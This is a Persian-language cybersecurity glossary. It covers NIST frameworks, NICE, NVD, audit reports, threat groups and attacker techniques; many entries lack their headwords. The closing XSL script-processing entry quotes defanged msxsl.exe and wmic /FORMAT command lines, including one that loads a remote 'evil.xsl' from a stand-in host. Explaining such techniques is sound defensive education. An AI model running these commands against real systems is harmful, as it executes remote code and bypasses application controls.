چارچوب امنیت سایبریNIST یک ابزار قدرتمند برای سازماندهی و بهبود برنامه امنیت سایبری است. مجموعه‌ای از دستورالعمل‌ها و بهترین شیوه‌ها برای کمک به سازمان‌ها در ایجاد و بهبود وضعیت امنیت سایبری است. این چارچوب مجموعه‌ای از توصیه‌ها و استانداردها را ارائه می‌دهد که سازمان‌ها را قادر می‌سازد تا در شناسایی و تشخیص حملات سایبری آمادگی بیشتری داشته باشند و همچنین دستورالعمل‌هایی در مورد نحوه پاسخگویی، پیشگیری و بازیابی حوادث سایبری ارائه می‌دهد. چارچوب امنیت سایبری که توسط موسسه ملی استاندارد و فناوری(NIST) تهیه شده است، در مورد امنیت سایبری به فقدان استانداردها می‌پردازد و مجموعه‌ای یکنواخت از قوانین، دستورالعمل‌ها و استانداردها را برای استفاده سازمان‌ها در صنایع مختلف ارائه می‌دهد. چارچوب امنیت سایبریNIST به عنوان استاندارد طلایی برای ایجاد یک برنامه امنیت سایبری در نظر گرفته می‌شود. این چارچوب همه قابلیت‌ها، پروژه‌ها، فرایندها، فعالیت‌های روزمره امنیت سایبری را در این 5 هسته طبقه‌بندی می‌کند: شناسایی: عملکرد شناسایی بر ایجاد زمینه برای یک برنامه امنیت سایبری موثر متمرکز شده است. این عملکرد به توسعه درک سازمانی برای مدیریت خطر امنیت سایبری برای سیستم‌ها، افراد، دارایی‌ها، داده‌ها و قابلیت‌ها کمک می‌کند. محافظت: عملکرد محافظت ضمانت‌های مناسب برای اطمینان از ارائه خدمات زیربنایی حیاتی را مشخص می‌کند و از توانایی محدود کردن یا مهار تأثیر یک رویداد احتمالی امنیت سایبری پشتیبانی می‌کند. تشخیص: تشخیص حوادث احتمالی امنیت سایبری بسیار مهم است و این عملکرد فعالیت‌های مناسب برای شناسایی به موقع وقوع یک امنیت سایبری را مشخص می‌کند. پاسخ دادن: عملکرد بر فعالیت‌های مناسب برای اقدام در صورت شناسایی یک حادثه امنیت سایبری متمرکز است و از توانایی مهار تأثیر یک حادثه احتمالی امنیت سایبری پشتیبانی می‌کند.

استانداردها و دستورالعمل‌هایی را برای سازمان‌های فدرال برای معماری و مدیریت سیستم‌های امنیت اطلاعات خود تعریف می‌کند. این برای ارائه راهنمایی برای حفاظت از داده‌های خصوصی شهروندان ایجاد شده است.

یک سند که حکم می‌کند چگونه پیمانکاران آژانس‌های فدرال باید اطلاعات کنترل نشده طبقه بندی شده را مدیریت کنند. به طور خاص برای سیستم‌ها و سازمان‌های اطلاعاتی غیرفدرال طراحی شده است.

تجدید نظر در چارچوب NIST ( نشر ویژه 800-181) ارائه می‌دهد: مجموعه ای کارآمد از "بلوک های سازنده" متشکل از بیانیه های وظیفه، دانش و مهارت، معرفی شایستگی ها به عنوان مکانیزمی برای سازمان ها برای ارزیابی فراگیران

ماموریت NICE انرژی بخشیدن، ترویج و هماهنگی یک جامعه قوی است که با هم کار می کنند تا یک اکوسیستم یکپارچه آموزش امنیت سایبری و توسعه نیروی کار را پیش ببرند.

چارچوب نیروی کار برای امنیت سایبری، یک مرجع اساسی برای توصیف و به اشتراک گذاری اطلاعات در مورد کار امنیت سایبری است که آن کار را به عنوان بیانیه های وظیفه بیان می‌کند و بیانیه های دانش و مهارت را توصیف می کند که پایه ای را برای یادگیرندگان از جمله دانش آموزان، جویندگان کار و کارمندان فراهم می کند. NICE یک واژگان مشترک و ثابت است که کار امنیت سایبری را طبقه بندی و توصیف می کند. چارچوب ارتباط را در مورد نحوه شناسایی، استخدام، توسعه و حفظ بهبود می بخشد. استعدادهای امنیت سایبری چارچوب NICE مرجعی است که سازمان‌ها یا بخش‌ها می‌توانند از طریق آن نشریات یا ابزارهای بیشتری را ایجاد کنند که نیازهای آنها را برای تعریف یا ارائه راهنمایی در مورد جنبه‌های مختلف آموزش امنیت سایبری، آموزش، و توسعه نیروی کار برآورده کند.

لیستی از شایستگی ها، نقش های کاری، وظایف، دانش و بیانیه های مهارت - از انتشارات ثابت حذف شده است. این انعطاف‌پذیری را برای به‌روزرسانی‌های مکرر به موادی که به طور منظم مرجع هستند، می‌دهد.

ابتکار ملی NIST برای آموزش امنیت سایبری ( NICE) مشارکتی بین دولت، دانشگاه و بخش خصوصی است که بر آموزش امنیت سایبری، آموزش، و توسعه نیروی کار متمرکز است.

NVD مخزن دولت ایالات متحده از داده های مدیریت آسیب پذیری مبتنی بر استاندارد است که با استفاده از پروتکل اتوماسیون محتوای امنیتی (SCAP) ارائه شده است. این داده ها خودکارسازی مدیریت آسیب پذیری، اندازه گیری امنیت و انطباق را امکان پذیر می کند. NVD شامل پایگاه‌های داده‌ای از مراجع چک‌لیست امنیتی، نقص‌های نرم‌افزار مرتبط با امنیت، پیکربندی‌های نادرست، نام محصولات و معیارهای تأثیر است.

NVD برای خدمت بهتر به پایگاه کاربر رو به رشد خود، کلیدهای API را در دسترس قرار داده. کاربرانی که یک کلید را درخواست و فعال می کنند ممکن است آن را به عنوان پارامتری از رشته URL درخواست خود بگنجانند. همراه با انتشار کلیدهای API، NVD از اسناد و اطلاعات جدید API برای کمک به توسعه دهندگان جدید برای شروع کار با NVD API رونمایی خواهد کرد. با شروع شش ماه پس از انتشار کلیدهای API، کاربرانی که درخواست‌های بدون کلید را ارسال می‌کنند، شاهد کاهش تعداد درخواست‌هایی هستند که می‌توانند در یک پنجره 60 ثانیه‌ای در حال انجام باشند. کاربرانی که درخواست‌هایی را ارسال می‌کنند که شامل کلید API آنها می‌شود، هیچ تغییری در سرویس مشاهده نمی‌کنند و ممکن است به درخواست‌ها با نرخ فعلی ادامه دهند.

مرکز ملی تعالی امنیت سایبری بخشی از بخش امنیت سایبری کاربردی آزمایشگاه فناوری اطلاعات NIST است. NCCoE اعضای صنعت خصوصی، سازمان های دولتی و دانشگاه را گرد هم می آورد. تا با هم راه‌حل‌های عملی و مبتنی بر استاندارد ایجاد کنند که سازمان‌ها در هر نوع و اندازه بتوانند برای محافظت از دارایی‌ها، افراد و داده‌های خود استفاده کنند. هر پروژه NCCoE توسط یک محقق اصلی NIST هدایت می‌شود که نظارت بر فرآیند توسعه را فراهم می کند و تیمی از کارشناسان موضوعی از جمله تخصص NCF را مدیریت می کند. از طریق NCCoE، دولت، صنعت و دانشگاه با یکدیگر همکاری می کنند تا به مهم ترین چالش‌های امنیت سایبری زیرساخت های تجاری رسیدگی کنند.

چارچوب امنیت سایبری NISTمجموعه ای از دستورالعمل ها برای کاهش خطرات امنیت سایبری سازمانی است که توسط موسسه ملی استانداردها و فناوری ایالات متحده (NIST) بر اساس استانداردها، دستورالعمل ها و شیوه‌های موجود منتشر شده است. این چارچوب "رده بندی سطح بالایی از نتایج امنیت سایبری و روشی برای ارزیابی و مدیریت آن، علاوه بر راهنمایی در مورد حفاظت از حریم خصوصی و آزادی های مدنی در زمینه امنیت سایبری نتایجی ارائه می دهد.

موسسه ملی استاندارد و فناوری چارچوب امنیت سایبری را توسعه داد. این سازمان‌ها را در هر اندازه‌ای قادر می‌سازد تا در مورد خطرات امنیت سایبری بحث، رسیدگی و مدیریت کنند.

NCS به نیروی کار NSA و جامعه اطلاعاتی آن و شرکای وزارت دفاع آموزش های بسیار تخصصی رمزنگاری و همچنین دوره هایی در زمینه رهبری، توسعه حرفه ای و بیش از 40 زبان خارجی ارائه می دهد.

یک سازمان غیرانتفاعی که با وزارت امنیت داخلی، حامیان بخش خصوصی و همکاران غیرانتفاعی همکاری می کند تا آگاهی امنیت سایبری را برای کاربران خانگی، مشاغل کوچک و متوسط و آموزش ابتدایی و متوسطه ارتقا دهد.

NCSAM یک تلاش مشترک بین دولت و صنعت برای افزایش آگاهی در مورد اهمیت امنیت سایبری و اطمینان از این است که همه آمریکایی ها منابع مورد نیاز برای ایمن تر و ایمن تر بودن آنلاین را دارند. هر سال در ماه اکتبر اتفاق می افتد. ماه آگاهی امنیتی با تلاش مشترک بخش امنیت سایبری ملی در وزارت امنیت داخلی و اتحاد غیرانتفاعی امنیت سایبری ملی آغاز شد.

NCSD بخشی از دفتر امنیت سایبری و ارتباطات با مأموریت همکاری با بخش خصوصی، دولت، ارتش و ذینفعان اطلاعاتی برای انجام ارزیابی ریسک و کاهش آسیب‌پذیری‌ها و تهدیدات برای دارایی‌های فناوری اطلاعات و فعالیت‌های مؤثر بر عملیات. زیرساخت‌های سایبری حیاتی دولت غیرنظامی و بخش خصوصی.

یک منبع آنلاین برای آموزش امنیت سایبری است که کارمندان دولت، دانشجویان، مربیان و صنعت را با ارائه دهندگان آموزش امنیت سایبری در سراسر ایالات متحده مرتبط می کند.

NISPOM دستورالعمل عملیاتی برنامه امنیت صنعتی ملی، رویه ها و الزامات استاندارد را برای همه پیمانکاران دولتی با توجه به اطلاعات طبقه بندی شده ایجاد می کند. این کل زمینه مسائل مربوط به امنیت دولتی و صنعتی را پوشش می دهد.

فناوری عملیاتی استفاده از سخت افزار و نرم افزار برای نظارت و کنترل فرآیندهای فیزیکی، دستگاه ها و زیرساخت ها است.

OPSEC اصطلاحی است که از ارتش ایالات متحده گرفته شده است و یک فرآیند تحلیلی است که برای رد اطلاعات دشمن استفاده می شود که می تواند محرمانه بودن و/یا امنیت عملیاتی یک ماموریت را به خطر بیندازد. انجام تکنیک های مربوط به OPSEC می تواند نقش مهمی در هر دو حمله ایفا کند. و استراتژی های دفاعی امنیت سایبری.

OSINT اطلاعاتی است که از داده‌های در دسترس عموم جمع‌آوری می‌شود، مورد بهره‌برداری قرار می‌گیرد و گزارش می‌شود تا یک نیاز اطلاعاتی خاص را برطرف کند. در جامعه اطلاعاتی، اصطلاح "باز" به منابع آشکار و در دسترس عموم (در مقابل منابع مخفی یا مخفی) اشاره دارد.

استاندارد امنیت داده‌های صنعت کارت پرداخت طبق قرارداد برای کسانی که داده‌های دارنده کارت را مدیریت می‌کنند، چه یک شرکت نوپا یا یک شرکت جهانی باشد، الزامی است. هدف آن کمک به ایمن سازی و حفاظت از کل اکوسیستم کارت پرداخت است.

مدیریت نظارت از راه دور که به عنوان مدیریت شبکه نیز شناخته می شود، نوعی پلتفرم است که برای کمک به ارائه دهندگان خدمات فناوری اطلاعات مدیریت شده طراحی شده است تا از راه دور و به طور فعال نقاط پایانی مشتری، شبکه ها و رایانه ها را نظارت کنند. همچنین اکنون به عنوان مدیریت فناوری اطلاعات از راه دور شناخته می شود.

چارچوبی برای تجزیه و تحلیل و مدیریت خطرات مرتبط با حملات تروریستی علیه دارایی های زیرساختی حیاتی است و فرآیندی برای ارزیابی پیامدها، آسیب پذیری و خطرات ناشی از تروریسم و مخاطرات طبیعی میباشد. RAMCAP توسط مؤسسه فناوری‌های نوآورانه ASME، LLC، برای تسهیل مقایسه خطرات بین دارایی‌ها در یک بخش و در بخش‌های مختلف با استفاده از اصطلاحات رایج و معیارهای اندازه‌گیری استاندارد توسعه داده شد. RAMCAP روشی است که در برنامه ملی حفاظت از زیرساخت (NIPP) برای استفاده در مقایسه بین بخشی مشخص شده است.

دشمنان ممکن است از روت کیت ها برای پنهان کردن وجود برنامه ها، فایل ها، اتصالات شبکه، سرویس ها، درایورها و سایر اجزای سیستم استفاده کنند. روت کیت ها برنامه هایی هستند که وجود بدافزار را با رهگیری/قلاب کردن و اصلاح فراخوانی های API سیستم عامل که اطلاعات سیستم را تامین می کنند، پنهان می کنند. قابلیت فعال‌سازی روت‌کیت‌ها یا روت‌کیت ممکن است در سطح کاربر یا هسته در سیستم‌عامل یا پایین‌تر باشد، که شامل Hypervisor، Master Boot Record یا Firmware سیستم می‌شود. روت‌کیت‌ها برای سیستم‌های Windows، Linux و Mac OS X دیده شده‌اند

دشمنان ممکن است از منابع سیستم های انتخاب شده برای حل مشکلات منابع فشرده استفاده کنند که ممکن است بر دسترسی سیستم و/یا سرویس میزبان تاثیر بگذارد. یکی از اهداف متداول Resource Hijacking اعتبارسنجی تراکنش‌های شبکه‌های ارزهای دیجیتال و کسب ارز مجازی است. دشمنان ممکن است منابع سیستم کافی را مصرف کنند تا تأثیر منفی بگذارند و/یا باعث شوند ماشین‌های آسیب‌دیده پاسخگو نباشند. سرورها و سیستم‌های مبتنی بر ابر] به دلیل پتانسیل بالای منابع موجود، اهداف مشترکی هستند، اما سیستم‌های نقطه پایانی کاربر نیز ممکن است به خطر بیفتند و برای ربودن منابع و استخراج ارزهای دیجیتال مورد استفاده قرار گیرند. محیط‌های کانتینری نیز ممکن است به دلیل سهولت استقرار از طریق APIهای در معرض دید و پتانسیل مقیاس‌گذاری فعالیت‌های استخراج با استقرار یا به خطر انداختن چندین کانتینر در یک محیط یا خوشه مورد هدف قرار گیرند.به‌علاوه، برخی بدافزارهای استخراج ارز دیجیتال، فرآیندهای بدافزار رقیب را از بین می‌برند تا اطمینان حاصل کنند که برای منابع رقابت نمی‌کنند.

یک گروه مجرم سایبری است که حداقل از سال 2015 فعال بوده و در درجه اول به کاربران سیستم های بانکی از راه دور در روسیه و کشورهای همسایه علاقه مند است. این گروه از تروجانی با همین نام (RTM) استفاده می‌کند.

گزارش کنترل خدمات سازمان نوع 1 (که به عنوان گزارش لحظه به لحظه نامیده می‌شود)، شامل توصیفی از سیستم یک سازمان خدماتی است و همچنین تأیید می‌کند که آیا کنترل‌های داخلی توصیف‌شده توسط یک سازمان خدماتی برای دستیابی به اهداف کنترلی مشخص طراحی شده‌اند یا خیر.

گزارش کنترل خدمات سازمان نوع 2 یک استاندارد حسابرسی است که توسط موسسه حسابداران رسمی آمریکا (AICPA) توسعه یافته است. طراحی شده است تا اطمینان حاصل شود که ارائه دهندگان خدمات و فروشندگان شخص ثالث از داده های حساس و اطلاعات شخصی در برابر دسترسی غیرمجاز محافظت می کنند.

گزارش کنترل خدمات سازمان نوع 3 اطلاعات مربوط به کنترل های داخلی یک سازمان خدماتی را برای امنیت، در دسترس بودن، یکپارچگی پردازش، محرمانه بودن یا حفظ حریم خصوصی نشان می دهد.

پروتکل اتوماسیون محتوای امنیتی روشی برای استفاده از استانداردهای خاص برای فعال کردن مدیریت آسیب‌پذیری خودکار، اندازه‌گیری و ارزیابی انطباق خط‌مشی سیستم‌های مستقر در یک سازمان، از جمله مطابقت FISMA (قانون مدیریت امنیت اطلاعات فدرال، 2002 است.

SANS یک شرکت خصوصی که در آموزش امنیت اطلاعات و صدور گواهینامه امنیتی تخصص دارد.

سیستمی که به کاربران این امکان را می دهد تا با ورود به سیستم با یک مجموعه از اعتبارنامه ها، به طور ایمن خود را با چندین برنامه و وب سایت احراز هویت کنند.

یک گروه تهدید است که گمان می رود خارج از چین فعالیت می کند و کشورهایی از جمله روسیه، بلاروس، مغولستان و سایر کشورها را هدف قرار داده است.

TA505یک گروه تهدید با انگیزه مالی است که حداقل از سال 2014 فعال بوده است. این گروه به دلیل تغییر مکرر بدافزارها و هدایت روندهای جهانی در توزیع بدافزارهای جنایی شناخته شده است.

TA551یک گروه تهدید با انگیزه مالی است که حداقل از سال 2018 فعال بوده است. این گروه عمدتاً از طریق کمپین های توزیع بدافزار مبتنی بر ایمیل، انگلیسی، آلمانی، ایتالیایی و ژاپنی زبانان را هدف قرار داده است.

TTP تاکتیک بالاترین سطح توصیف این رفتار است، در حالی که تکنیک‌ها توصیف دقیق‌تری از رفتار در زمینه یک تاکتیک ارائه می‌دهند، و توصیفی حتی سطح پایین‌تر و بسیار دقیق را در زمینه یک تکنیک انجام می‌دهند.

کاربران سیستم را ردیابی می کند و به دنبال الگوهای رفتاری غیرعادی است. در امنیت سایبری، این فرآیند به شناسایی تهدیدات داخلی و سایر حملات هدفمند از جمله کلاهبرداری مالی کمک می کند. راه‌حل‌های تحلیل رفتار کاربر به الگوهای رفتار انسان نگاه می‌کنند و سپس الگوریتم‌ها و تحلیل‌های آماری را برای تشخیص ناهنجاری‌های معنادار از آن الگوها اعمال می‌کنند. این امر تلاش‌ها را برای اصلاح رفتار غیرعمدی که کسب‌وکار را در معرض خطر و فریب‌های پرخطر و عمدی قرار می‌دهد هدایت می‌کند.

با اتصال از طریق VPN، تمام داده‌هایی که ارسال و دریافت می‌کنید از طریق یک "تونل" رمزگذاری شده عبور می‌کنند تا هیچ‌کس نتواند آنچه را که ارسال می‌کنید ببیند یا اگر آن‌ها را به دست آورد، آن‌ها را رمزگشایی کند. VPN ها همچنین به شما این امکان را می دهند که مکان فیزیکی و آدرس IP خود را مخفی کنید و به جای آن اغلب آدرس IP سرویس VPN را نمایش می دهید.

دشمنان ممکن است قابلیت رمزگذاری دستگاه شبکه را به خطر بیاندازند تا از رمزگذاری عبور کنند که در غیر این صورت از ارتباطات داده محافظت می کند. از رمزگذاری می توان برای محافظت از ترافیک شبکه انتقال یافته برای حفظ محرمانه بودن (محافظت در برابر افشای غیرمجاز) و یکپارچگی (محافظت در برابر تغییرات غیرمجاز) استفاده کرد. رمزهای رمزگذاری برای تبدیل یک پیام متنی ساده به متن رمزی استفاده می‌شوند و می‌توانند از نظر محاسباتی برای رمزگشایی بدون کلید رمزگشایی مرتبط، فشرده باشند. به طور معمول، کلیدهای طولانی تر، هزینه های رمزگشایی یا رمزگشایی بدون کلید را افزایش می دهند.دشمنان می توانند دستگاه هایی را که ترافیک شبکه را رمزگذاری می کنند به خطر بیاندازند و دستکاری کنند. به عنوان مثال، از طریق رفتارهایی مانند اصلاح تصویر سیستم، کاهش فضای کلید، و غیرفعال کردن سخت افزار کریپتو، یک دشمن می تواند تأثیر منفی داشته باشد و/یا توانایی دستگاه را برای رمزگذاری ایمن ترافیک شبکه از بین ببرد. این امر خطر بیشتری برای افشای غیرمجاز دارد و ممکن است به تسهیل دستکاری داده ها، دسترسی به اعتبار یا تلاش های جمع آوری کمک کند.

برنامه نویسی بین سایت (XSS) نوعی آسیب‎پذیری امنیتی است که در برخی از برنامه‌های وب یافت می‌شود. حملات XSS مهاجمان را قادر می‌سازد تا اسکریپت‌های سمت مشتری را به صفحات وب مشاهده شده توسط سایر کاربران تزریق کنند. مهاجمان می‌توانند از آسیب‌پذیری اسکریپت‌نویسی بین سایتی برای دور زدن کنترل‌های دسترسی مانند خط مشی همان منبع استفاده کنند.

دشمنان ممکن است با جاسازی اسکریپت ها در فایل های XSL، کنترل برنامه را دور بزنند و اجرای کد را مبهم کنند. فایل های Extensible Stylesheet Language (XSL) معمولاً برای توصیف پردازش و ارائه داده ها در فایل های XML استفاده می شوند. برای پشتیبانی از عملیات پیچیده، استاندارد XSL شامل پشتیبانی از برنامه نویسی تعبیه شده در زبان های مختلف است. ممکن است دشمنان از این عملکرد برای اجرای فایل های دلخواه سوء استفاده کنند و در عین حال کنترل برنامه را دور بزنند. مشابه اجرای Trusted Developer Utilities Proxy Execution، باینری ابزار تبدیل خط مشترک مایکروسافت (msxsl.exe)را می توان برای اجرای جاوا اسکریپت مخرب تعبیه شده در فایل های XSL محلی یا راه دور (به URL مرجع) نصب و استفاده کرد. از آنجایی که msxsl.exe به طور پیش فرض نصب نشده است، دشمن احتمالاً باید آن را با فایل های حذف شده بسته بندی کند. Msxsl.exe دو آرگومان اصلی دارد، یک فایل منبع XML و یک شیوه نامه .XSL از آنجایی که فایل XSL XML معتبر است، حریف ممکن است یک فایل XSL را دو بار فراخوانی کند. هنگام استفاده از msxsl.exe، دشمنان ممکن است به فایل‌های XML/XSL یک پسوند فایل دلخواه بدهند. نمونه‌های خط فرمان: msxsl.exe customers[.]xml script[.]xsl msxsl.exe script[.]xsl script[.]xsl msxsl.exe script[.]jpeg script[.]jpeg یکی دیگر از انواع این تکنیک، به نام Squiblytwo، شامل استفاده از ابزار مدیریت ویندوز برای فراخوانی JScript یا VBScript در یک فایل XSL است.این تکنیک همچنین می‌تواند اسکریپت‌های محلی/راه‌دور را اجرا کند و مانند همتای خود Regsvr32/ ، از یک ابزار ویندوزی قابل اعتماد و داخلی بهره می‌برد. دشمنان ممکن است از هر نام مستعار موجود در Windows Management Instrumentation سوء استفاده کنند، مشروط بر اینکه از سوئیچ /FORMAT استفاده کنند. نمونه‌های خط فرمان: Local File: wmic process list /FORMAT:evil[.]xsl Remote File: wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl"